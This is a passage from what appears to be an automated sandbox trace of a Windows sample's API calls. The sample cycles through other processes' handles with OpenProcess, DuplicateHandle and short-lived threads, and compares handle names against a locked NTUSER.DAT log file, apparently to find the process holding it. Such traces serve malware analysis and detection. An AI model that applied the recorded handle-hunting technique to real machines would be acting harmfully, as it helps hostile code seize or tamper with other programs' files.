(in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.430] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.432] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.432] CloseHandle (hObject=0x670) returned 1 [0154.432] CloseHandle (hObject=0x680) returned 1 [0154.432] CloseHandle (hObject=0x62c) returned 1 [0154.432] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.432] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.433] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.433] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.433] CloseHandle (hObject=0x670) returned 1 [0154.433] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.434] CloseHandle (hObject=0x680) returned 1 [0154.434] CloseHandle (hObject=0x62c) returned 1 [0154.434] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.434] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.434] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.435] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.435] CloseHandle (hObject=0x670) returned 1 [0154.435] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.435] CloseHandle (hObject=0x680) returned 1 [0154.435] CloseHandle (hObject=0x62c) returned 1 [0154.435] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.435] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.436] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.436] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.436] CloseHandle (hObject=0x670) returned 1 [0154.436] CloseHandle (hObject=0x680) returned 1 [0154.437] CloseHandle (hObject=0x62c) returned 1 [0154.437] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.437] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.437] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.438] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.438] CloseHandle (hObject=0x670) returned 1 [0154.438] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.438] CloseHandle (hObject=0x680) returned 1 [0154.438] CloseHandle (hObject=0x62c) returned 1 [0154.438] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.438] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.439] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.440] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.440] CloseHandle (hObject=0x670) returned 1 [0154.440] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.440] CloseHandle (hObject=0x680) returned 1 [0154.440] CloseHandle (hObject=0x62c) returned 1 [0154.440] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.440] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.441] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.441] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.441] CloseHandle (hObject=0x670) returned 1 [0154.441] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.442] CloseHandle (hObject=0x680) returned 1 [0154.442] CloseHandle (hObject=0x62c) returned 1 [0154.442] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.442] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.442] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.444] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.444] CloseHandle (hObject=0x670) returned 1 [0154.445] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.445] CloseHandle (hObject=0x680) returned 1 [0154.445] CloseHandle (hObject=0x62c) returned 1 [0154.445] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.445] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.445] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.446] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.446] CloseHandle (hObject=0x670) returned 1 [0154.446] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.446] CloseHandle (hObject=0x680) returned 1 [0154.446] CloseHandle (hObject=0x62c) returned 1 [0154.446] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.446] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.447] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.447] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.448] CloseHandle (hObject=0x670) returned 1 [0154.448] CloseHandle (hObject=0x680) returned 1 [0154.448] CloseHandle (hObject=0x62c) returned 1 [0154.448] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.448] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.448] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.450] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.450] CloseHandle (hObject=0x670) returned 1 [0154.450] CloseHandle (hObject=0x680) returned 1 [0154.450] CloseHandle (hObject=0x62c) returned 1 [0154.450] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.450] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.451] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.452] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.452] CloseHandle (hObject=0x670) returned 1 [0154.452] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.452] CloseHandle (hObject=0x680) returned 1 [0154.452] CloseHandle (hObject=0x62c) returned 1 [0154.452] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.452] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.453] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.454] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.454] CloseHandle (hObject=0x670) returned 1 [0154.454] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.454] CloseHandle (hObject=0x680) returned 1 [0154.454] CloseHandle (hObject=0x62c) returned 1 [0154.454] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.455] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.455] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.456] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.456] CloseHandle (hObject=0x670) returned 1 [0154.456] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.456] CloseHandle (hObject=0x680) returned 1 [0154.456] CloseHandle (hObject=0x62c) returned 1 [0154.456] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.456] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.457] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.458] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.458] CloseHandle (hObject=0x670) returned 1 [0154.458] CloseHandle (hObject=0x680) returned 1 [0154.458] CloseHandle (hObject=0x62c) returned 1 [0154.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.458] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.459] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.459] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.459] CloseHandle (hObject=0x670) returned 1 [0154.459] CloseHandle (hObject=0x680) returned 1 [0154.460] CloseHandle (hObject=0x62c) returned 1 [0154.460] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.460] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.460] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.461] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.461] CloseHandle (hObject=0x670) returned 1 [0154.461] CloseHandle (hObject=0x680) returned 1 [0154.461] CloseHandle (hObject=0x62c) returned 1 [0154.461] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.461] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.462] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.463] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.463] CloseHandle (hObject=0x670) returned 1 [0154.463] CloseHandle (hObject=0x680) returned 1 [0154.463] CloseHandle (hObject=0x62c) returned 1 [0154.463] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.463] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.464] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.464] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.464] CloseHandle (hObject=0x670) returned 1 [0154.464] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.465] CloseHandle (hObject=0x680) returned 1 [0154.465] CloseHandle (hObject=0x62c) returned 1 [0154.465] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.465] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.465] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.466] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.466] CloseHandle (hObject=0x670) returned 1 [0154.466] CloseHandle (hObject=0x680) returned 1 [0154.466] CloseHandle (hObject=0x62c) returned 1 [0154.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.466] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.467] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.468] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.468] CloseHandle (hObject=0x670) returned 1 [0154.468] CloseHandle (hObject=0x680) returned 1 [0154.468] CloseHandle (hObject=0x62c) returned 1 [0154.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.468] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.468] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.469] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.469] CloseHandle (hObject=0x670) returned 1 [0154.469] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.469] CloseHandle (hObject=0x680) returned 1 [0154.470] CloseHandle (hObject=0x62c) returned 1 [0154.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.470] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.474] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.475] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.475] CloseHandle (hObject=0x670) returned 1 [0154.475] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.475] CloseHandle (hObject=0x680) returned 1 [0154.475] CloseHandle (hObject=0x62c) returned 1 [0154.475] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.475] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.476] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.476] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.477] CloseHandle (hObject=0x670) returned 1 [0154.477] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.477] CloseHandle (hObject=0x680) returned 1 [0154.477] CloseHandle (hObject=0x62c) returned 1 [0154.477] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0154.477] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.478] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.478] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.478] CloseHandle (hObject=0x670) returned 1 [0154.478] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.478] CloseHandle (hObject=0x680) returned 1 [0154.479] CloseHandle (hObject=0x62c) returned 1 [0154.479] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.479] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.479] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.479] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.480] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.480] CloseHandle (hObject=0x670) returned 1 [0154.480] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.480] CloseHandle (hObject=0x680) returned 1 [0154.480] CloseHandle (hObject=0x62c) returned 1 [0154.480] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.480] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.481] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.481] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.482] CloseHandle (hObject=0x670) returned 1 [0154.482] CloseHandle (hObject=0x680) returned 1 [0154.482] CloseHandle (hObject=0x62c) returned 1 [0154.482] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.482] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x280, 